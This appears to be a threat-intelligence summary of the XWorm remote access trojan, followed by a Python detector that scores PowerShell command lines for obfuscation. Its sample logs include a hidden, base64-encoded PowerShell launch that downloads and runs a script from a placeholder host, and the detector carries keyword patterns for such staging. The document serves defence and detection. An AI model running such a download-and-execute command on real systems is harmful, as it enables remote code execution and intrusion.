Executive Summary
XWorm is a Remote Access Trojan (RAT) that is usually distributed under the malware-as-a-service (MaaS) model. First detected in July 2022, it targets system resources: it collects hardware information such as GPU, CPU and RAM details, transmits that information to command and control servers, and turns the infected system into a bot for use in Distributed Denial of Service (DDoS) attacks. It also has dangerous capabilities such as monitoring user activity and carrying out various espionage activities.
The sources and targets of XWorm vary with the purpose of the attack and the motivations of the threat actors behind it. While it usually targets the banking and finance sector for financial gain, it is also used in espionage attacks against state institutions. These attacks are carried out through botnets and servers located in different countries, notably Russia, China and North Korea.
XWorm usually infiltrates systems through phishing attacks and evades detection by means of various obfuscation techniques and PowerShell commands. It turns infected devices into remotely controlled bots and uses them for data exfiltration, DDoS attacks and other malicious actions. This report details XWorm's observed technical characteristics, how it operates and the areas in which it poses a threat, and provides recommendations on how organisations can protect themselves against such threats.
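The summary notes that the malware hides behind obfuscated PowerShell invocations. The following is an added detection example, not tooling from this report or from any XWorm analysis; it assumes that endpoint logs expose the full PowerShell command line (for instance Sysmon Event ID 1 or Windows Security Event ID 4688 with command-line auditing enabled). It scores the launch flags that commonly accompany obfuscation (encoded command, hidden window, profile and execution-policy bypass), decodes any `-EncodedCommand` argument (base64 of a UTF-16LE string) and scores keywords in the decoded script. The log lines, the weights and the threshold are constructed for the example; a real deployment would tune them against its own baseline.

```python
"""Score PowerShell command lines for obfuscation indicators (added example)."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Launch flags that commonly accompany obfuscated PowerShell. PowerShell
# accepts abbreviated flag names, so the patterns cover the short forms too.
# Labels and weights are assumptions for this example, not from the report.
SUSPICIOUS_FLAGS = {
    r"-e(nc(odedcommand)?)?\b": ("encoded command", 2),
    r"-w(indowstyle)?\s+hidden\b": ("hidden window", 2),
    r"-nop(rofile)?\b": ("profile bypass", 1),
    r"-ex(ecutionpolicy)?\s+bypass\b": ("execution policy bypass", 1),
}

# Captures the base64 argument that follows -e / -enc / -EncodedCommand.
ENCODED_ARG = re.compile(
    r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

# Keywords in the decoded script that raise the score (matched on lower-case text).
CONTENT_KEYWORDS = re.compile(
    r"\b(invoke-expression|iex|downloadstring|frombase64string)\b"
)


@dataclass
class Finding:
    line: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand takes base64 of a UTF-16LE string; None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(line: str) -> Finding:
    """Score one command line and record why it scored."""
    finding = Finding(line=line)
    for pattern, (label, weight) in SUSPICIOUS_FLAGS.items():
        if re.search(pattern, line, re.IGNORECASE):
            finding.score += weight
            finding.reasons.append(label)
    match = ENCODED_ARG.search(line)
    if match:
        decoded = decode_encoded_command(match.group(1))
        if decoded is None:
            finding.score += 1
            finding.reasons.append("undecodable encoded argument")
        else:
            finding.decoded = decoded
            for keyword in CONTENT_KEYWORDS.findall(decoded.lower()):
                finding.score += 2
                finding.reasons.append(f"decoded content contains {keyword}")
    return finding


def flag_suspicious(lines, threshold: int = 4) -> List[Finding]:
    """Return the findings whose score reaches the threshold."""
    return [f for f in map(analyze, lines) if f.score >= threshold]


def ps_encode(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample command lines: one routine admin task, one obfuscated
# launch carrying a staged download (placeholder host), one interactive query.
SAMPLE_LOGS = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1",
    "powershell.exe -nop -w hidden -enc "
    + ps_encode(
        "Invoke-Expression (New-Object Net.WebClient)"
        ".DownloadString('http://placeholder.invalid/stage')"
    ),
    'pwsh -c "Get-Process | Sort-Object CPU -Descending"',
]

if __name__ == "__main__":
    for finding in flag_suspicious(SAMPLE_LOGS):
        print(f"score={finding.score} reasons={finding.reasons}")
        print(f"  decoded: {finding.decoded}")
```

Only the second sample line reaches the threshold: the benign backup script also uses `-NoProfile` and `-ExecutionPolicy Bypass`, which is why those flags carry low weight on their own and the decoded script content is what tips the score. Decoding the argument is the important step, because the base64 text itself carries no keywords a plain string match could catch.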